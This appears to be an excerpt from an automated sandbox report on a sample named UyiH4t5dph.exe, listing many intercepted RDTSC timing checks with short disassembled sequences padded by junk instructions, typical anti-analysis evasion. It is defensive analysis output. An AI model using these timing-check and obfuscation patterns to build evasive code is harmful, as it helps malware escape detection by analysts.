Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54CCD6 second address: 54CCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54CCDA second address: 54CCE7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54AFFE second address: 54B004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54B004 second address: 54B00A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54B2CD second address: 54B2E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE6E8F184BDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54B2E0 second address: 54B2EA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE6E8B2908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54B8D4 second address: 54B8EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FE6E8F184B6h 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007FE6E8F184B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54BBD2 second address: 54BC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8B2908Dh 0x00000009 jmp 00007FE6E8B29099h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE6E8B29097h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54C4E2 second address: 54C4E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5529C9 second address: 5529FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007FE6E8B29086h 0x0000000c popad 0x0000000d pop edx 0x0000000e push eax 0x0000000f jmp 00007FE6E8B2908Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE6E8B29098h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5529FF second address: 552A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 552A03 second address: 552A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 551AA5 second address: 551AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8F184BBh 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55235D second address: 5523A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FE6E8B290ABh 0x0000000c jmp 00007FE6E8B29096h 0x00000011 jmp 00007FE6E8B2908Fh 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE6E8B29092h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 552511 second address: 552516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 552516 second address: 55251C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55251C second address: 552520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 556EDA second address: 556EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 56034F second address: 560355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 560355 second address: 560359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4A44C8 second address: 4A44D2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE6E8F184B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4A44D2 second address: 4A44E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jnl 00007FE6E8B29086h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55E6F7 second address: 55E6FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55E6FF second address: 55E703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55EFC0 second address: 55EFDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55F285 second address: 55F289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55F39F second address: 55F3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 55F3A3 second address: 55F3A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 56662A second address: 566630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 566630 second address: 566639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5741A4 second address: 5741B0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE6E8F184B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573D71 second address: 573D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573D77 second address: 573D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573D7C second address: 573D86 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8B2908Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573EDC second address: 573EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573EE0 second address: 573EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573EEE second address: 573EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573EF2 second address: 573EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573EF6 second address: 573F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE6E8F184B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 573F02 second address: 573F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29090h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 576B69 second address: 576B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 576B71 second address: 576B91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FE6E8B2908Eh 0x00000010 push ecx 0x00000011 jo 00007FE6E8B29086h 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 576B91 second address: 576BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BDh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 576BA3 second address: 576BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 576735 second address: 576740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 576740 second address: 576748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 58E5A6 second address: 58E5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 58E5AC second address: 58E5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 58E5B0 second address: 58E5C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE6E8F184BBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 58E5C5 second address: 58E5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5AA8C1 second address: 5AA8C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5AA8C8 second address: 5AA8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5A5A66 second address: 5A5A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5A5A6A second address: 5A5A70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5B8589 second address: 5B858F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5B82B1 second address: 5B82B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5B82B7 second address: 5B82BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D11C3 second address: 5D11C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D0233 second address: 5D0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D0237 second address: 5D025B instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8B29086h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d jng 00007FE6E8B290A4h 0x00000013 pushad 0x00000014 jmp 00007FE6E8B2908Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D03D0 second address: 5D03D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D03D6 second address: 5D03DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D03DC second address: 5D03E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D06F5 second address: 5D06FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D09E3 second address: 5D09E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D0B1C second address: 5D0B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D0B20 second address: 5D0B2A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D3CA7 second address: 5D3CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D3CAB second address: 5D3CDB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE6E8F184C8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FE6E8F184B6h 0x00000017 jnc 00007FE6E8F184B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D7EDF second address: 5D7EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D7EEE second address: 5D7EF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D7EF3 second address: 5D7EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D9E5D second address: 5D9E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FE6E8F184C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5D9E6B second address: 5D9E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460182 second address: 5460188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460188 second address: 5460197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B2908Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545003D second address: 545007E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dh, al 0x0000000f call 00007FE6E8F184C5h 0x00000014 mov eax, 58A75E07h 0x00000019 pop eax 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov di, ax 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE6E8F184BDh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 545007E second address: 54500A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B2908Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54500A4 second address: 54500C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54500C0 second address: 54500C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54500C4 second address: 54500D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54500D7 second address: 54500DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54500DD second address: 54500E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480EC3 second address: 5480ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480ED2 second address: 5480F21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov ebx, 5968E56Ch 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FE6E8F184BBh 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE6E8F184C5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54200C3 second address: 54200CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54200CB second address: 54200D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a mov edx, eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54200D7 second address: 54200DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54200DB second address: 542012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov edx, esi 0x00000009 movzx ecx, di 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FE6E8F184C8h 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FE6E8F184BDh 0x0000001e add ch, FFFFFFA6h 0x00000021 jmp 00007FE6E8F184C1h 0x00000026 popfd 0x00000027 push eax 0x00000028 pop edx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 542012C second address: 542019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE6E8B29093h 0x00000014 add ah, FFFFFF8Eh 0x00000017 jmp 00007FE6E8B29099h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FE6E8B29090h 0x00000023 jmp 00007FE6E8B29095h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440D3E second address: 5440D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440D44 second address: 5440D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440D48 second address: 5440D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544088B second address: 544088F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544088F second address: 5440893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440893 second address: 5440899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440899 second address: 544089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544089F second address: 54408A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
